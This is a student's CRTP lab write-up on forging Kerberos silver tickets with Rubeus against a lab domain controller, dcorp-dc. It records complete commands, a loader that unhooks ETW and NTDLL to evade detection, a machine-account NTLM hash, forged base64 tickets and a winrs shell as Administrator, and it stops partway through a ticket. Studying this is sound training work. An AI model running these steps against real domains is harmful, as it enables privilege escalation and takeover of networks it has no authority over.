crtp-09

1 – Try to get command execution on the domain controller by creating silver ticket for:

• HTTP

• WMI

Flag 18 [dcorp-dc] – The service whose Silver Ticket can be used for winrs or PowerShell Remoting 🚩

Based on the last task we already have the hash for the machine account of the domain controller (dcorp-dc$).

RID  : 000003e8 (1000)
User : DCORP-DC$
LM   :
NTLM : 4855e21503a77d55411cb38f183cb60e

We can create a Silver Ticket that provides us access to the HTTP service (WinRM) on DC:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:e4ce16e20da2e11d2901e0fb8a4f28b0 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

c:\Users\student98>klist purge

Current LogonId is 0:0x14e3f3c4
        Deleting all tickets:
        Ticket(s) purged!

c:\Users\student98>klist

Current LogonId is 0:0x14e3f3c4

Cached Tickets: (0)

c:\Users\student98>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:4855e21503a77d55411cb38f183cb60e /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : C:\AD\Tools\Rubeus.exe Arguments : evasive-silver /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:4855e21503a77d55411cb38f183cb60e /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
[*] Action: Build TGS

[*] Trying to query LDAP using LDAPS for user information on domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(samaccountname=Administrator)'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group Policy Creator Owners,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Builtin,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-719815819-3726368948-3917688648-513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL error code ERROR_ACCESS_DENIED (5)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\us.dollarcorp.moneycorp.local\SYSVOL error code ERROR_BAD_NET_NAME (67)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Retrieving netbios name information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for '(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group Policy Creator Owners,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain Admins,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Builtin,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-1028785420-4100948154-1806204659-513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL error code ERROR_ACCESS_DENIED (5)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\us.dollarcorp.moneycorp.local\SYSVOL error code ERROR_BAD_NET_NAME (67)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Retrieving netbios name information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for '(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Building PAC

[*] Domain         : DOLLARCORP.MONEYCORP.LOCAL (dcorp)
[*] SID            : S-1-5-21-719815819-3726368948-3917688648
[*] UserId         : 500
[*] Groups         : 544,512,520,513
[*] ServiceKey     : 4855E21503A77D55411CB38F183CB60E
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey         : 4855E21503A77D55411CB38F183CB60E
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_MD5
[*] Service        : http
[*] Target         : dcorp-dc.dollarcorp.moneycorp.local

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'Administrator' to 'http/dcorp-dc.dollarcorp.moneycorp.local'

[*] AuthTime       : 10/23/2025 5:43:13 AM
[*] StartTime      : 10/23/2025 5:43:13 AM
[*] EndTime        : 10/23/2025 3:43:13 PM
[*] RenewTill      : 10/30/2025 5:43:13 AM

[*] base64(ticket.kirbi):

      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
      cnAubW9uZXljb3JwLmxvY2Fs


[+] Ticket successfully imported!

c:\Users\student98>klist

Current LogonId is 0:0x14e3f3c4

Cached Tickets: (1)

#0>     Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
        Server: http/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 10/23/2025 5:43:13 (local)
        End Time:   10/23/2025 15:43:13 (local)
        Renew Time: 10/30/2025 5:43:13 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:

c:\Users\student98>

We can check if we got the correct service ticket:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args klist

And run klist or C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args klist we can see it

http/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL

c:\Users\student98>klist

Current LogonId is 0:0x14e3f3c4

Cached Tickets: (1)

#0>     Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
        Server: http/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 10/23/2025 5:43:13 (local)
        End Time:   10/23/2025 15:43:13 (local)
        Renew Time: 10/30/2025 5:43:13 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:

c:\Users\student98>

let’s try accessing it using winrs. Note that we are using FQDN of dcorp-dc as that is what the service ticket has:

winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd
set username
set computername

c:\Users\student98>winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Administrator>set username
set username
USERNAME=Administrator

C:\Users\Administrator>set computername
set computername
COMPUTERNAME=DCORP-DC

C:\Users\Administrator>

For accessing WMI, we need to create two tickets: one for HOST service and another for RPCSS.

We can start to run the following commands from an elevated shell:

C:\Users\student98>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:host/dcorp-dc.dollarcorp.moneycorp.local /rc4:4855e21503a77d55411cb38f183cb60e /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
C:\Users\student98>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:rpcss/dcorp-dc.dollarcorp.moneycorp.local /rc4:4855e21503a77d55411cb38f183cb60e /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

Verify that tickets generated are present:

C:\Windows\system32>cd c:\users\student98

c:\Users\student98>klist

Current LogonId is 0:0x14e3f3c4

Cached Tickets: (0)

c:\Users\student98>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:host/dcorp-dc.dollarcorp.moneycorp.local /rc4:4855e21503a77d55411cb38f183cb60e /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : C:\AD\Tools\Rubeus.exe Arguments : evasive-silver /service:host/dcorp-dc.dollarcorp.moneycorp.local /rc4:4855e21503a77d55411cb38f183cb60e /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
[*] Action: Build TGS

[*] Trying to query LDAP using LDAPS for user information on domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(samaccountname=Administrator)'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group Policy Creator Owners,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Builtin,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-719815819-3726368948-3917688648-513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL error code ERROR_ACCESS_DENIED (5)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\us.dollarcorp.moneycorp.local\SYSVOL error code ERROR_BAD_NET_NAME (67)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Retrieving netbios name information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for '(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group Policy Creator Owners,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain Admins,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Builtin,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-1028785420-4100948154-1806204659-513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL error code ERROR_ACCESS_DENIED (5)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\us.dollarcorp.moneycorp.local\SYSVOL error code ERROR_BAD_NET_NAME (67)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Retrieving netbios name information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for '(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Building PAC

[*] Domain         : DOLLARCORP.MONEYCORP.LOCAL (dcorp)
[*] SID            : S-1-5-21-719815819-3726368948-3917688648
[*] UserId         : 500
[*] Groups         : 544,512,520,513
[*] ServiceKey     : 4855E21503A77D55411CB38F183CB60E
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey         : 4855E21503A77D55411CB38F183CB60E
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_MD5
[*] Service        : host
[*] Target         : dcorp-dc.dollarcorp.moneycorp.local

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'Administrator' to 'host/dcorp-dc.dollarcorp.moneycorp.local'

[*] AuthTime       : 10/23/2025 5:58:07 AM
[*] StartTime      : 10/23/2025 5:58:07 AM
[*] EndTime        : 10/23/2025 3:58:07 PM
[*] RenewTill      : 10/30/2025 5:58:07 AM

[*] base64(ticket.kirbi):

      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
      cnAubW9uZXljb3JwLmxvY2Fs


[+] Ticket successfully imported!


c:\Users\student98>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:rpcss/dcorp-dc.dollarcorp.moneycorp.local /rc4:4855e21503a77d55411cb38f183cb60e /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : C:\AD\Tools\Rubeus.exe Arguments : evasive-silver /service:rpcss/dcorp-dc.dollarcorp.moneycorp.local /rc4:4855e21503a77d55411cb38f183cb60e /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
[*] Action: Build TGS

[*] Trying to query LDAP using LDAPS for user information on domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(samaccountname=Administrator)'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group Policy Creator Owners,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Builtin,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-719815819-3726368948-3917688648-513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL error code ERROR_ACCESS_DENIED (5)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\us.dollarcorp.moneycorp.local\SYSVOL error code ERROR_BAD_NET_NAME (67)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Retrieving netbios name information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for '(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group Policy Creator Owners,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain Admins,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Builtin,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-1028785420-4100948154-1806204659-513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL error code ERROR_ACCESS_DENIED (5)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\us.dollarcorp.moneycorp.local\SYSVOL error code ERROR_BAD_NET_NAME (67)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Retrieving netbios name information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for '(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Building PAC

[*] Domain         : DOLLARCORP.MONEYCORP.LOCAL (dcorp)
[*] SID            : S-1-5-21-719815819-3726368948-3917688648
[*] UserId         : 500
[*] Groups         : 544,512,520,513
[*] ServiceKey     : 4855E21503A77D55411CB38F183CB60E
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey         : 4855E21503A77D55411CB38F183CB60E
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_MD5
[*] Service        : rpcss
[*] Target         : dcorp-dc.dollarcorp.moneycorp.local

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'Administrator' to 'rpcss/dcorp-dc.dollarcorp.moneycorp.local'

[*] AuthTime       : 10/23/2025 5:58:42 AM
[*] StartTime      : 10/23/2025 5:58:42 AM
[*] EndTime        : 10/23/2025 3:58:42 PM
[*] RenewTill      : 10/30/2025 5:58:42 AM

[*] base64(ticket.kirbi):

      doIGKDCCBiSgAwIBBaEDAgEWooIE6jCCBOZhggTiMIIE3qADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
      T1JQLkxPQ0FMojcwNaADAgECoS4wLBsFcnBjc3MbI2Rjb3JwLWRjLmRvbGxhcmNvcnAubW9uZXljb3Jw
      LmxvY2Fso4IEfjCCBHqgAwIBF6EDAgEDooIEbASCBGiQBv9XB3XLy6yrYu+YbUImQ+3Xj9P7g9Ikue3+
      TAO8hd1B7i109HpsVx2yZmgSyVRe3lLXaoA+e3hk9Z2TrruF/T1ycnQULalQenWJSa2zGOUB2OyPdf67
      kLty+vyotNX+AZVtpTCHw2/ZdyizjFm8DgLeSTjeBnfGffUPxrFltTAMnTgnmatRj9phJ53wVEHuWcKw
      4XQrtYOMd4EZRV7idiSO+ksF6+Os4f5Cj++zXJUYmCOfR5PtRkt7cmCveRYrTH1w5Bh8B8SkT818OOcK
      mZ1AOsLzhJTxt9h7MGE8V3tMjrWABMs+S0kPSjDqxf2DxKtbpH1QaWAb806+6MSmeoe0Q7wqozXWpmzb
      kxve3eVycxM+M56UWj+3JLsYJn4GOxm++zKWtr0Jb9bAsNXCn+rdp9aZEqDv0upRGNGP7xHWF6Vi+eof
      dW6AB0HQGt8j3H/L5Pf586Ayvp3LWmvqKa6RiX5S1ZCnyxzCLlR5fmk3yn7jSslVrXqFv/bdRrsb3aBp
      b/GW78WSBfpYgPT+BgdffnFm3ELdOVFRajLgw/MTRmrAByhwglzb96cI15G/BPEOjdl7GKZP7FduPsKS
      A1SUMXrFo5qc1UiR8rjyirIbj/en6xmf4HOyiniv5CQN7+yW/KGcgVPNScJYL0s9xLHbCFzE8JOHVIcw
      nRi8V5aithqz09UBaeQDe/4lkDh7a2lhn336ZzWTWXxVCosC/H67JBV2GtnI0vLDhAmnoXTbUvwAPdUa
      HGMpZ1QWzBOUg6NxmlKQ57ksU3zhfUAHmHasItLpXoDgB9Hp9cAdNlJeOFAmTxLEDZSscAdeM/wLQ9A8
      KHHVsg7QHIekTSm7YuRvdBpip/04xQELmbI6+nAvCtxehHv8dIFOZamRZrB6rULY+2ulqwa5m5cnH0v9
      EpV8CaDg7Hz3ZmMfBsSawcRLO7JG+i4COwQVBYdSVCnrt9qcCTBRBpUc77i7SwkwJS4GpPEpS7I4A2AJ
      0BJYw3mXhWsbjJ8y944QbgBCPFHoCSpcjX4ykw6zFWAB3hi/aTWN9DeroihaSVgMXzgxSswd+1qkJktI
      idzKjHkE8b+oJT5DsmkWwxoA2VZtvlFZgkaO/2UUu3Y7rPQ8lc3PAWbYbQOTtBCCirLDDiiZZmJ0SbPk
      +qge0XIqERhHOHTEiD29XCjZhzjfKWcbGyNnBZzRi2qR3CSWyqkt/4z2MGqMhl9ELyYwA/C11FwSeRuk
      oQSPvChZ44mGrraFBFoczIaBLIViUwytz6dTiKuMsZZlvwAi8N/y6kCfSGd9/2+Kj5s8zqpc1HXorxy6
